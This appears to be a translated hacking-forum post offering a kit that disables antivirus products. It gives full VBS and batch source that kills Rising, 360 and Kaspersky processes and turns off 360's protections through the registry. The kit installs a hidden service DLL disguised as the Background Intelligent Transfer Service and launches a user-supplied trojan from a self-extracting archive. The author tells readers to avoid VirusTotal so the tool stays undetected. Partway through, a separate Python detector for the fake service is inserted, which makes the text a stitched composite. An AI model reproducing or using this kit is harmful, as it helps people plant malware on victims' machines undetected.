An Xx that can take out Rising, Kingsoft, NOD32 and 360
This contains two .bat files and two .vbs files, plus one kill.exe
Source code below:
Source of setdt.vbs:
set Cleaner=createobject("wscript.shell")
Cleaner.run "setdt.bat",vbhide
.......
Source of setdt.bat:
@ECHO OFF
@date /t>C:\time.txt
date 1988-09-18
hide.vbs
@date <C:\time.txt
del %SystemRoot%\system32\setdt.vbs
del %SystemRoot%\system32\hide.vbs
del %SystemRoot%\system32\command.exe
del %SystemRoot%\system32\xKill.exe
del %SystemRoot%\system32\xkill.bat
del C:\time.txt
del %0
..................
Source of hide.vbs:
dim shell
set shell=CreateObject("Wscript.Shell")
WScript.Sleep 10***00
shell.run "cmd /c start %SystemRoot%\system32\xKill.exe",0
set Cleaner=createobject("wscript.shell")
Cleaner.run "xkill.bat",vbhide
WScript.Sleep 10***00
shell.run "cmd /c start %SystemRoot%\system32\command.exe",0
......................
Source of xkill.bat:
@echo off
taskkill /f /im rstray.exe >NUL
taskkill /f /im 360tray.exe >NUL
taskkill /f /im 360safe.exe >NUL
echo Windows Registry Editor Version 5.00>>kill.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon]>>kill.reg
echo "MonAccess"=dword:000****0000>>kill.reg
echo "SiteAccess"=dword:000****0000>>kill.reg
echo "ExecAccess"=dword:000****0000>>kill.reg
echo "UDiskAccess"=dword:000****0000>>kill.reg
echo "LeakShowed"=dword:000****0000>>kill.reg
sc create DARK binpath= %windir%\System32\darkkill.dll
sc config DARK start= disabled
echo Windows Registry Editor Version 5.00>>dark.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK]>>dark.reg
echo "Type"=dword:000****0110>>dark.reg
echo "Start"=dword:000****0002>>dark.reg
echo "ErrorControl"=dword:000****0001>>dark.reg
echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\>>dark.reg
echo74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,\>>dark.reg
echo00,76,00,63,00,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,20,00,2d,00,\>>dark.reg
echo6b,00,20,00,6e,00,65,00,74,00,73,00,76,00,63,00,73,00,00,00>>dark.reg
echo "DisplayName"="Background Intelligent Transfer Service">>dark.reg
echo "DependOnService"=hex(7):52,00,70,00,63,00,53,00,73,00,00,00,00,00>>dark.reg
echo "DependOnGroup"=hex(7):00,00>>dark.reg
echo "ObjectName"="LocalSystem">>dark.reg
echo "Description"=hex(2):00,00>>dark.reg
echo
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Parameters]>>dark.reg
echo "ServiceDll"=hex(2):43,00,3a,00,5c,00,57,00,49,00,4e,00,44,00,4f,00,57,00,53,\>>dark.reg
echo00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,64,00,61,00,\>>dark.reg
echo72,00,6b,00,6b,00,69,00,6c,00,6c,00,2e,00,64,00,6c,00,6c,00,00,00>>dark.reg
echo
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Security]>>dark.reg
echo "Security"=hex:01,00,14,80,90,00,00,00,9c,00,00,00,14,00,00,00,30,00,00,00,02,\>>dark.reg
echo00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\>>dark.reg
echo00,00,02,00,60,00,04,00,00,00,00,00,14,00,fd,01,02,00,01,01,00,00,00,00,00,\>>dark.reg
echo05,12,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,\>>dark.reg
echo20,02,00,00,00,00,14,00,8d,01,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,\>>dark.reg
echo00,18,00,fd,01,02,00,01,02,00,00,00,00,00,05,20,00,00,00,23,02,00,00,01,01,\>>dark.reg
echo00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00>>dark.reg
echo
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Enum]>>dark.reg
echo "0"="Root\\LEGACY_DARK\\0000">>dark.reg
echo "Count"=dword:000****0001>>dark.reg
echo "NextInstance"=dword:000****0001>>dark.reg
regedit /s dark.reg
regedit /s kill.reg
COPY dark.dll %windir%\System32\darkkill.dll
sc config DARK start= AUTO
net start DARK
attrib %windir%\System32\darkkill.dll +s +h
del kill.reg
del dark.reg
del dark.dll
del dark.exe
xkill.exe
taskkill /f /im kav.exe >NUL
del %0
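As an added example (not part of the original post), a Python check a responder could run over a captured .reg fragment like the dark.reg that xkill.bat writes: it decodes the hex(2) values and flags an svchost-hosted service whose key name or ServiceDll contradicts the BITS display name it claims. The sample .reg text is constructed from the values above; the one-entry known-good table (genuine BITS under the key "BITS", hosted from qmgr.dll) is an assumption kept deliberately small for illustration.

```python
import re

# Constructed sample: the DARK fragment the batch file above writes to dark.reg (hex(2) = REG_EXPAND_SZ as UTF-16LE bytes).
SAMPLE_REG = r'''[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK]
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,\
00,76,00,63,00,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,20,00,2d,00,\
6b,00,20,00,6e,00,65,00,74,00,73,00,76,00,63,00,73,00,00,00
"DisplayName"="Background Intelligent Transfer Service"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Parameters]
"ServiceDll"=hex(2):43,00,3a,00,5c,00,57,00,49,00,4e,00,44,00,4f,00,57,00,53,\
00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,64,00,61,00,\
72,00,6b,00,6b,00,69,00,6c,00,6c,00,2e,00,64,00,6c,00,6c,00,00,00
'''
# Assumed known-good table (one entry, for illustration): genuine BITS lives under key "BITS" and loads qmgr.dll.
KNOWN = {"Background Intelligent Transfer Service": ("BITS", "qmgr.dll")}
SVCHOST_RE = re.compile(r"svchost\.exe\s+-k\s+\w+", re.IGNORECASE)

def decode_value(raw):
    # hex(2)/hex(7) byte lists are UTF-16LE strings; every other value type is kept as text.
    if raw.startswith(("hex(2):", "hex(7):")):
        data = bytes(int(b, 16) for b in raw.split(":", 1)[1].split(",") if b)
        return data.decode("utf-16-le").rstrip("\x00")
    return raw.strip('"')

def parse_reg(text):
    # Returns {key_path: {value_name: value}} after joining the "\"-continued hex lines.
    keys, current = {}, None
    for line in re.sub(r",\\\r?\n\s*", ",", text).splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current and line.startswith('"'):
            name, _, raw = line[1:].partition('"=')
            keys[current][name] = decode_value(raw)
    return keys

def suspicious_svchost_services(keys):
    # Flag svchost-hosted services whose key name or ServiceDll contradicts the DisplayName they claim.
    findings = []
    for path, values in keys.items():
        expected = KNOWN.get(values.get("DisplayName", ""))
        if not expected or not SVCHOST_RE.search(values.get("ImagePath", "")):
            continue
        key_name = path.rsplit("\\", 1)[-1]
        dll = keys.get(path + "\\Parameters", {}).get("ServiceDll", "")
        if key_name != expected[0] or not dll.lower().endswith("\\" + expected[1]):
            findings.append((key_name, values["DisplayName"], dll))
    return findings
```

On the sample this reports the DARK key as a BITS impostor, because both its key name and its ServiceDll (darkkill.dll) differ from what the display name implies.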
I can't program, so I had to start from VBS and batch; it feels pretty good.
As for xkill.exe, it's a packed program a friend gave me; he said the packer had a backdoor and asked me to see whether I could remove it.
In a daze I extracted the core part and then gave it AV-evasion treatment.
Running xkill.exe directly can terminate Rising, NOD32 and Kingsoft; I haven't tested the others.
Still, I recommend using xkill.exe together with my VBS and batch files; that way it can also take out 360 and Kaka, and should also be able to break Kaspersky's proactive defense.
If you ask why I don't install Kaspersky and try it, well, my machine already has 5 security products installed, and adding Kaspersky on top is really too much~~
Everyone, don't upload xkill.exe to an antivirus scanning site to try it out. Once, a sincere undetectable trojan was placed before me and I didn't cherish it. I uploaded it to the scanning site www.virustotal.com, and the result........
To use this little tool: after extracting it, copy your trojan into the extracted directory and rename it command.exe, then use WinRAR to build a self-extracting archive and choose to run setdt.vbs after extraction.
I'm about to start the third year of junior high; school gives only one day off a week. If I don't log in for a long time after school starts, I hope the admins won't delete my account~
Tool MD5: 9566b78aa41***70b148f90baa137e7de